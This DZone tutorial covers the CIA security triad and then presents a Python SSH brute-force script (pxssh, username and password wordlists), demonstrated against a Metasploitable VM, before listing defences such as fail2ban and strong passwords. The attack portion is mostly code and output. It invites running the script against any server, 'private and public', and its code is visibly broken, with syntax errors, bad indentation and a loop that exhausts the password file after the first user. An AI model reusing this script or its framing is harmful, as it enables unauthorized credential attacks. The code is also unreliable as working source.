Over a million developers have joined DZone.
{{announcement.body}}
{{announcement.title}}

The CIA Triad and SSH Brute-Forcing

DZone 's Guide to

The CIA Triad and SSH Brute-Forcing

Perform and prevent an ssh brute-force attack.

· Security Zone ·
Free Resource

Confidentiality

Confidentiality is an aspect of security based on access restriction to private information. To make it simple, a person who is allowed to access some information is verified to be the one to whom that information belongs to. "What is the place of authentication," you may ask. Well, authentication is part of confidentiality, as well as identification and authorization. The set of those three words is the key to achieving confidentiality.

  • Identification: the ability to identify a user of a system or an application that is running in the system.
  • Authentication: the ability to prove that a user or application is genuinely who that person or what that application claims to be.
  • Authorization: the mechanism used to determine user privilege or access-level related to system resources.

Let's look at an example to better understand confidentiality.

For example, a user logs in to Alibaba Cloud to manage his cloud services by entering is username and password (identification). The system will check for his credentials in a database or a file (authentication). If all looks good, the user will log into his workspace and will see only what is for him (authorization).

Another way to achieve Confidentiality is to apply physical protection like locking server rooms and hashing data with a cryptography algorithm.

Integrity

Integrity involves maintaining the consistency, accuracy, and trustworthiness of data. It is a principle of the CIA Triad and is designed to protect data from deletion or modification from any unauthorized party. It ensures that when an authorized person makes a change that should not have been made, the damage can be reversed. Integrity is implemented using security mechanisms, such as data encryption and hashing. It's also important to have a backup procedure and redundant systems in place to ensure data integrity.

Availability

Availability ensures that information and resources are reachable by those who may request them at any time. Availability is best ensured by rigorously maintaining all hardware, performing hardware repairs immediately when needed, and maintaining a functioning operating system environment that is free of conflicts. Providing adequate communication bandwidth and preventing the occurrence of bottlenecks are equally important.

Redundancy, failover, and RAID can mitigate serious consequences when hardware issues occur. Fast and adaptive disaster recovery is essential for worst-case scenarios. To prevent data loss, a backup copy should be stored in a geographically-isolated location. Extra security equipment or software, such as firewalls and proxy servers and load balancing can also improve responsiveness and increase availability and guard against downtime and unreachable data due to malicious actions such as denial-of-service (DoS) attacks and network intrusions.

SSH Brute-Forcing 

Now that we've familiarized ourselves with the CIA Triad, let's segue into a popular topic in cybersecurity: SSH brute-forcing. There are two key concepts that you need to know: SSH and brute-forcing. Before writing our code, let me explain each concept.

SSH

SSH stand for SECURE SHELL. It was developed in 1995 as a replacement for rlogin, telnet, and rsh, all of which were vulnerable for sniffing attack, an attack that lets hackers see all data transferring on the network. When the service is running on a system, the listening port is 22. If you want to know if your ssh port is active, just enter this line of command netstat -atnp | grep "ssh, and if the service is turning, you will see something like this:

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 8377/sshd tcp6 0 0 :::22 :::* LISTEN 8377/sshd 


SSH uses a cryptography algorithm to generate a private and public key to secure transferring data on the network. We won't be talking about cryptography here, as it deserves its own article. To summarize, we can say that SSH is the encrypted version of the protocol used to remote system administration.

Brute-Forcing

Brute-force is a technique used to find credentials on a system by trying multiples combinations of entries until the correct one is found. When we use a file containing credentials, we are talking about dictionary attack; when we are using all possibilities, including special characters, we are talking about brute-forcing. However, in a dictionary attack, we can also have special characters, but not all possibilities. We can summarize by saying that a brute-force attack is a technique used to find credentials for a computer (end-user, router, or server).

Example

After information gathering (passive and active) phases, you may have several ports open (22, 145, 21, 53, 80). If you want to access the system remotely, if there is no exploit for a remote attack, having credentials is necessary. Now that we have understood the theoretical concept, let's see how an ssh brtue-force attack works in application.

The script will have four parts:

So to start let import our modules.

from pexpect import pxssh
import termcolor
import sys


Pxssh: the most important in our script because is the one we use to connect to ssh port.

Termcolor: we use to color our password if successful.

Sys: module we use to take arguments from shell.

Now, lets continue by importing our connect function.

def connect(host, user, password): 
  try: 
    ssh=pxssh.pxssh()
    ssh.force_password=True
    ssh.login(host,user,password)
    print("password found "+termcolor.colored(user+":"+password,'yellow'))
  except: pxssh.ExceptionPxssh as e:
      print(e)
  except KeyboardInterrupt as k: 
    print("\n")
    print("terminate")
    print("raison:program stop by user",)
    sys.exit(0)


As you can see, connect function have three parameters: host, user, password. It tries to connect to the host with username and password that will receive and print the credentials (username, password) found. If the connection didn't succeed, it will print the reason.

Let's continue with main module

def main(): 
if len(sys,argv) < 3: 
    print("Usage: python %prag -host -userfile -passfile")
    print(" ")
    print("Example: python {0} 192.168.10.2 tot.txt tit.txt".format(sys.argv[0]))
    sys.exit(0)
  else: 
    host = sys.argv[1]
    userfile = open(sys.argv[2], 'r')
    passfile = open(sys.argv[3], 'r')

    for u in userfile.readLines(): 

        for d in passfile.readLines(): 
      user = u.strip("\n")
      password = d.strip("\n")
      print(str(user) + ":" + str(password))
      connect(host,str(user),str(password))
    userfile.close()
    passfile.close()


The main function is the one who checks for parameters. If all parameters are given, then it will try all possible passwords in the file to get the correct credential.

Now the last part doesn't need a screenshot because all we have to do is to check the file called main file, and if is it, then start the main function.

This is the line of code

 if __name__=="__main__": main()

Now let's see if our code is doing his job.

I have my virtual machine (metasploitable) with port 22 and others open. So I'll try to brute-force credential

thewind@windows:~/Documents/workstation/python/violent$ python3.6 sshBru.py
Usage: python %prog -host -userfile -passfile

Example: python sshBru.py 192.168.10.2 tot.txt titi.txt
thewind@windows:~/Documents/workstation/python/violent$ python3.6 sshBru.py 192.168.43.138 dict.txt user.txt
msfadmin:password
password refused
masfadmin:masfadmin
password found msfadmin:msfadmin
masfadmin:admin
password refused
msfadmin:user
password refused
masfadmin:linux
^C

terminate
raison:program stop by user
the wind@windows:~/Documents/workstation/python/violent$


You can see that the result found the credentials in our password file. And you can test the script in the server anywhere (private and public).

Protecting Yourself from SSH Brute Force

Now that we have seen how to crack a password, the question is, "what we can do to protect ourselves from this attack?" In this last part, we are going to talk about how to protect yourself against password hacking.

CIA triad is a model designed to guide policies for information security within an organization. "C" stands for Confidentiality. Confidentiality is implemented for apply access restriction, and one good access restriction implementation is password protection.

Password protection is implemented in different ways depending on the application or system organization. So, we are going to talk about some techniques to protect against password hacking.

1. Strong Password

Let's imagine that you have an account on Alibaba Cloud for your online business, and Alibaba provides a good security system to protect you against hackers. But let's say your password is your birth date, or something simple like "abc123". With just a simple guess, a hacker can quickly gain access to your account and comprise your entire system. To avoid this problem, the first and best solution is to use a strong password. A strong password is a password that contains more than seven characters and uses a combination of upper and lower case letters, special characters, and numbers. This type of password can take very long to be cracked with a normal computer (personal computer). There are also password generators you can use depending on your needs.

2. Be Wary of Phishing

Phishing is a technique used by a hacker to get user sensitive information (username, password, card number, etc). The best way to protect yourself from this type of attack is to be careful when you click on a link.

Let's use this scenario for further explanation. You receive mail from your account from "Alibbaba Cloud" saying that someone tried to access your account and that you should share your credentials for further verification. You enter your information quickly, but there is a problem; you were not careful when checking the name "Alibbaba Cloud". Because of this, you gave your information to a hacker. To prevent this, always make sure to double-check links on your email, and whenever there's doubt, always reach out to the supposed company's support team.

3. Use Fail2ban

Say you have your ECS set up on Alibaba Cloud and you use it to connect through SSH. Now, how can you protect yourself from ssh password cracking? One of the best solutions is to use fail2ban. Fail2ban is a security framework that protects you against brute-forcing attacks by banning IP addresses.

4. Regular Password Changing

As mentioned before, a strong password can make life difficult for hackers. But one thing to note that a hacker never gives up easily. Hackers may continually scan for various possibilities or browser history for any stored password or data. The best way to solve all these is to regularly change your password, so that even when a hacker discovers your password, he will not be able to use your account for a long time.

How often you should change your password? Well, it depends. For mission-critical systems, normally you have to do it each week. For services seldom exposed to the internet, you can get away with keeping the same password for as long as 6 months.

Topics:
security ,tutorials ,ddos ,web application firewall

Published at DZone with permission of

Opinions expressed by DZone contributors are their own.

{{ parent.title || parent.header.title}}

{{ parent.tldr }}

{{ parent.urlSource.name }}